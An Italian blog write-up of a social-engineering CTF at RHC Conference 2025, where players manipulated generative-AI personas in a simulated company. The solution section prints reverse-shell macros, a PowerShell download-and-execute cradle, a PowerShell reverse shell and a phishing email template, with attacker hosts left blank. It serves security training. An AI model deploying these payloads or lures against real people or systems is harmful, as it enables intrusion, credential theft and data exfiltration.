CTF di RHC 2025. Ingegneria sociale in gioco: scopri la quarta “flag” non risolta

Manuel Roccon : 3 Luglio 2025 07:12

La RHC Conference 2025, organizzata da Red Hot Cyber, ha rappresentato un punto di riferimento per la comunità italiana della cybersecurity, offrendo un ricco programma di talk, workshop e competizioni. Tra gli eventi più attesi, spiccano le Capture The Flag (CTF), che hanno coinvolto i partecipanti in sfide avvincenti e realistiche.

Queste CTF hanno portato i partecipanti nel cuore di una crisi geopolitica simulata: una Cyber Warfare Ibrida contro la nazione fittizia di Minzhong, in cui attori malevoli puntavano a sabotare la supply chain e le reti 4G locali. Questa simulazione, realizzata con il contributo di CyberSecurityUP, Hackmageddon e Fondazione Bruno Kessler (FBK), ha spinto i concorrenti a confrontarsi con tematiche moderne come AI, minacce ibride, disinformazione e infrastrutture critiche, alzando l’asticella del realismo tecnico e narrativo.

Una delle CTF più innovative è stata quella dedicata al Social Engineering, organizzata dalla FBK e dall’Università di Trento in collaborazione con il collettivo HackerHood, che ha offerto ai partecipanti un’esperienza immersiva e un approccio rivoluzionario per le sfide CTF, simulando un ambiente realistico gestito dall’intelligenza artificiale, che gli attaccanti potevano compromettere combinando tecniche di manipolazione psicologica con exploit tecnologici.

Una piattaforma di social engineering per una CTF realistica

La CTF sul Social Engineering si è distinta per l’uso innovativo di una piattaforma sperimentale sviluppata in ambito di ricerca. Questa piattaforma, creata da FBK e dall’Università di Trento, ha  generato dinamicamente una finta infrastruttura ICT: indirizzi email, utenti fittizi, un servizio di storage cloud e identità virtuali dotate di personalità credibili, in grado di interagire in linguaggio naturale con i partecipanti.

Il cuore della competizione non era l’exploitation tecnica, ma l’inganno: convincere questi “personaggi virtuali” a rivelare informazioni sensibili, cliccare su link o scaricare allegati. Tutto questo grazie all’uso sapiente dell’ingegneria sociale, combinata con l’analisi dei dettagli dell’ambiente simulato.

Il contributo di HackerHood: test e adattamento

Il collettivo HackerHood ha avuto un ruolo essenziale nella riuscita della competizione, contribuendo non solo ad una validazione iniziale di tale piattaforma ma anche all’adattamento della stessa al contesto CTF. Dopo numerose sessioni di test, sono stati migliorati stabilità, scalabilità e credibilità dell’infrastruttura.

I partecipanti si sono trovati davanti a un ecosistema realistico e immersivo, in cui ogni azione produceva reazioni coerenti da parte degli utenti simulati, grazie a un motore di intelligenza artificiale generativa. Questo ha elevato notevolmente il livello di sfida, rendendo ogni interazione una prova di astuzia e precisione linguistica.

Le Flag della CTF: Social Engineering in azione

La CTF si è articolata in una serie di flag a difficoltà crescente, tutte basate sull’ingegneria sociale e sull’interazione con l’ambiente simulato. Ogni flag rappresentava una tappa nel percorso di compromissione dell’infrastruttura aziendale fittizia.

Panoramica delle principali flag

• Scopri la password di un dipendente
  Obiettivo: convincere un dipendente a rivelare o lasciar trapelare la propria password.
  
• Viola il ticket system aziendale
  Obiettivo: scoprire l’indirizzo email nascosto del supporto IT e sfruttarlo per un attacco.
  
• Recupera il file “lista-esuberi”
  Obiettivo: ottenere un file riservato presente solo nel sistema di online file sharing.
  
• Recupera una password condivisa
  Obiettivo: identificare una mail interna in cui veniva condivisa una password aziendale.
  
• Scopri la chiave privata del CEO
  Obiettivo: recuperare una chiave SSH inviata via email, sfruttando altre compromissioni precedenti.
  

L’ultima sfida irrisolta “Leggi il contenuto del budget aziendale”

Questa flag rappresentava il punto avanzato dell’intera CTF: per ottenerla, i partecipanti dovevano recuperare e leggere un file PDF riservato chiamato budget-aziendale.pdf, presente solo sul laptop Windows del CEO. Il file era protetto da una password nota soltanto a chi avesse risolto la flag “Recupera una password condivisa” nascosta fra le conversazioni di due dipendenti.

L’obiettivo poteva essere raggiunto seguendo due percorsi alternativi, entrambi validi ma di difficoltà diversa:

1. Accesso tramite SSH:

Tramite una campagna di phishing o social engineering, i partecipanti potevano indurre uno qualunque dei “personaggi virtuali” ad aprire una macro malevola o eseguire un payload da un allegato, ottenendo così accesso completo al sistema Linux. Era quindi possibile utilizzare la chiave SSH ottenuta dal completamento della flag “Scopri la chiave privata del CEO” per accedere interattivamente e tramite movimento laterale al laptop del CEO e leggere il file localmente.

Da un punto di vista più pratico, questo può essere riassunto nei seguenti passaggi.

• Recupero della chiave privata del CEO: accedere alla casella mail del CEO e recuperare la sua chiave privata inviata tramite mail. La chiave era gia’ in possesso se la flag “Scopri la chiave privata del CEO” era gia’ stata completata.
• Estrazione della chiave privata del CEO: convincere il CEO a fornire il proprio ID, in modo da poter estrarre la chiave privata. 
• Creazione del documento malevolo: creare un documento LibreOffice contenente una macro capace di aprire una reverse shell. Un esempio di macro e’ riportato di seguito.

Function Main
        shell("bash -c 'bash -i &> /dev/tcp// 0>&1'")
End Function

• Invio del payload: inviare una mail ad uno dei dipendenti utilizzanti Linux allegando il file malevolo. Un testo di esempio di tale mail e’ riportato di seguito.

Gentile Utente,
in allegato le nuove policy di sicurezza appena approvate. La invitiamo cortesemente a prenderne visione e a procedere alla loro attuazione al fine di migliorare la security posture dell'azienda

Restiamo a disposizione per ogni dubbio e chiarimento.

Cordialmente,
Il dipartimento IT.

• Upload della chiave privata del CEO: caricare sul laptop del dipendente la chiave privata del CEO ottenuta in precedenza.
• Movimento laterale: Utilizzare la shell acquisita sul laptop del dipendente per effettuare un movimento laterale, collegandosi tramite SSH al laptop del CEO mediante l’uso della chiave SSH.
• Download del file: Esfiltrare il file “budget-aziendale.zip” copiandolo, ad esempio, sul proprio laptop tramite protocollo ftp.
• Recupero della password per aprire il file: accedere alla casella mail del CEO e recuperare la password necessaria per l’apertura del file. Tale password e’ la soluzione alla flag “Recupera una password condivisa”
• Apertura del file: Utilizzare la password per poter estrarre il file e leggerne il contenuto.
  

2. Violazione diretta del laptop del CEO:

Tramite una campagna di phishing o social engineering, i partecipanti potevano indurre il CEO ad aprire una macro malevola o eseguire un payload da un allegato, ottenendo così accesso completo al sistema. Questa strategia era più complicata dal momento che sul portatile Windows era presente un antivirus.Da un punto di vista più pratico, questo può essere riassunto nei seguenti passaggi.

• Creazione del documento malevolo: creare un documento Microsoft Office contenente una macro capace di aprire una reverse shell. In questo caso era necessario operare delle operazioni di offuscamento sulla macro, poiché il laptop del CEO era protetto da un antivirus capace di bloccare le macro malevole in chiaro. Un esempio di macro in chiaro  e’ riportato di seguito. 

Sub Auto_Open()
      Last = "powershell -exec bypass IEX ((new-object
      net.webclient).downloadstring('http:///poc.txt')) -WindowStyle Minimized"
      CreateObject("Wscript.Shell").Run Last
End Sub

Il contenuto del file poc.txt per questa macro e’ riportato di seguito.

$client = New-Object System.Net.Sockets.TCPClient("",);$stream=$client.GetStrean();[byte[]]$bytes = 0..655351|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCITEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

• Invio del payload: inviare una mail al CEO allegando il file malevolo. Un testo di esempio di tale mail e’ riportato al punto d del metodo procedente.
• Download del file: Esfiltrare il file “budget-aziendale.zip” copiandolo, ad esempio, sul proprio laptop tramite protocollo ftp.
• Recupero della password per aprire il file: accedere alla casella mail del CEO e recuperare la password necessaria per l’apertura del file. Tale password e’ la soluzione alla flag “Recupera una password condivisa”
• Apertura del file: Utilizzare la password per poter estrarre il file e leggerne il contenuto.
  

Entrambe le strategie richiedevano competenze trasversali, tempismo e il corretto uso delle flag ottenute in precedenza: la password del file veniva acquisita solo tramite la flag “Recupera una password condivisa”, e l’accesso al sistema era subordinato a compromissioni precedenti “Scopri la chiave privata del CEO” o  “Scopri la password di un dipendente”.

Criticità e caratteristiche

• Il file non era accessibile tramite il sistema di file sharing in cloud.
• Era necessario ricostruire correttamente la topologia aziendale per pianificare l’accesso al dispositivo del CEO.
• Il file conteneva la flag finale, una frase ironica che rifletteva il tema aziendale fittizio della simulazione:
  CTFRHC{{W3_H4V3_NO_M0R3_MON3Y}}
  

Completamento e Motivi del fallimento

Nonostante il 95% del percorso fosse stato risolto, nessun team è riuscito a ottenere questa flag e secondo una preliminare valutazione i principali motivi sono i seguenti:

• Gestione del tempo: i partecipanti sono arrivati molto vicini alla soluzione, ma non hanno avuto il tempo sufficiente per completare la catena finale di compromissioni e accessi necessari.
  
• Approccio tecnico predominante: molti team hanno preferito concentrarsi sull’identificazione e lo sfruttamento di possibili vulnerabilità tecniche dell’infrastruttura, sottovalutando la componente di social engineering, che in questo scenario era in realtà la chiave per aggirare i controlli e convincere i personaggi virtuali ad agire.
  
• Complessità dell’ambiente IA: il comportamento del CEO era gestito da un’IA configurata per ignorare email da contatti esterni, rendendo inefficaci approcci diretti e costringendo i team a cercare vie interne più complesse.
  

Conclusioni

I commenti raccolti al termine della competizione parlano chiaro: la combinazione di una piattaforma di social engineering realistica ed interazioni dinamiche guidate da intelligenza artificiale ha offerto ai partecipanti un’esperienza nuova e fresca rispetto alle altre sfide disponibili. Tutti i partecipanti erano concordi sul fatto che questo tipo di approccio fosse una ventata d’aria fresca rispetto alle classiche sfide, costringendoli anche a cambiare mentalità e prospettiva per poterla portare a termine.

La sfida ha alzato significativamente l’asticella, non solo in termini tecnici, ma soprattutto per la capacità di simulare scenari credibili, in cui il fattore umano è al centro del gioco. In un’epoca in cui la manipolazione dell’informazione e l’ingegneria sociale sono armi reali, esperienze come questa rappresentano un passo importante verso una formazione più completa, moderna e aderente alla realtà delle minacce informatiche. La sperimentazione ha dimostrato che è possibile fare didattica e ricerca in modo innovativo, coinvolgente e ad alto impatto.

Il presente articolo e le attività descritte sono frutto di una collaborazione tra FBK, Università di Trento ed Hackerhood. Si ringraziano Manuel Roccon, Matteo Bridi, Alessandro Molinari, Domenico Siracusa, Claudio Facchinetti e Daniele Santoro.

Manuel Roccon
Ho iniziato la mia carriera occuparmi nella ricerca e nell’implementazioni di soluzioni in campo ICT e nello sviluppo di applicazioni. Al fine di aggiungere aspetti di sicurezza in questi campi, da alcuni anni ho aggiunto competenze inerenti al ramo offensive security (OSCP), occupandomi anche di analisi di sicurezza e pentest in molte organizzazioni.

Lista degli articoli